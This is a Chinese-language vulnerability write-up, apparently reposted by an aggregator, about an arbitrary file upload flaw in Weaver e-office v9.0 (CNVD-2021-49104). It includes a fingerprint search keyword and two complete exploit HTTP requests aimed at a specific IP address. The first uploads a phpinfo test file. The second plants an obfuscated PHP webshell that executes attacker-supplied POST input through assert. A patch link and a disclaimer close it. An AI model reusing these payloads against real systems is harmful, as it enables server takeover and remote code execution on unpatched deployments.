泛微 e-office v9.0任意文件上传漏洞{CNVD-2021-49104}

Posted 星球守护者

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了泛微 e-office v9.0任意文件上传漏洞{CNVD-2021-49104}相关的知识,希望对你有一定的参考价值。

目录

漏洞介绍

影响版本

漏洞环境

漏洞复现一

漏洞复现二

修复方法

参考连接

免责声明


漏洞介绍

  • 泛微e-office是泛微旗下的一款标准协同移动办公平台。

  • 泛微e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行,攻击者可利用该漏洞获取服务器控制权。

影响版本

  • 泛微e-office V9.0

关键字

  • app="泛微e-office V9.0"

漏洞环境

漏洞复现一

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1

Host: 121.4.67.191:8082

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/92.0.4515.159 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Connection: close

Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6

Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348

Content-Length: 250

Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

--e64bdf16c554bbc109cecef6451c26a4

Content-Disposition: form-data; name="Filedata"; filename="test.php"

Content-Type: image/jpeg

<?php phpinfo();?>

--e64bdf16c554bbc109cecef6451c26a4--

漏洞复现二

上传一句话

连接

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1

Host: 121.4.67.191:8082

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Connection: close

Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6

Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348

Content-Length: 250

Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

--e64bdf16c554bbc109cecef6451c26a4

Content-Disposition: form-data; name="Filedata"; filename="test.php"

Content-Type: image/jpeg

<?php              

$b = "assert";

$a = 'b';

$$a($_POST['test']);

?>

--e64bdf16c554bbc109cecef6451c26a4--

修复方法

厂商已提供漏洞修补方案,建议用户下载使用:

http://v10.e-office.cn/eoffice9update/safepack.zip

参考连接

https://cnvd.org.cn/flaw/show/CNVD-2021-49104

https://mp.weixin.qq.com/s/fnMM4_-u99YsRh9SSYiKZA

https://mp.weixin.qq.com/s/P75K_0869h-nWHRMu06zgQ

泛微oa前台任意文件上传(漏洞分析+复现)

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!

以上是关于泛微 e-office v9.0任意文件上传漏洞{CNVD-2021-49104}的主要内容,如果未能解决你的问题,请参考以下文章

CNVD-2021-49104——泛微E-Office文件上传漏洞

CNVD-2021-49104——泛微E-Office文件上传漏洞

CNVD-2021-49104——泛微E-Office文件上传漏洞

安全漏洞之任意文件上传漏洞分析

泛微OA V8 SQL注入漏洞和文件上传漏洞

e-cology与e-office的区别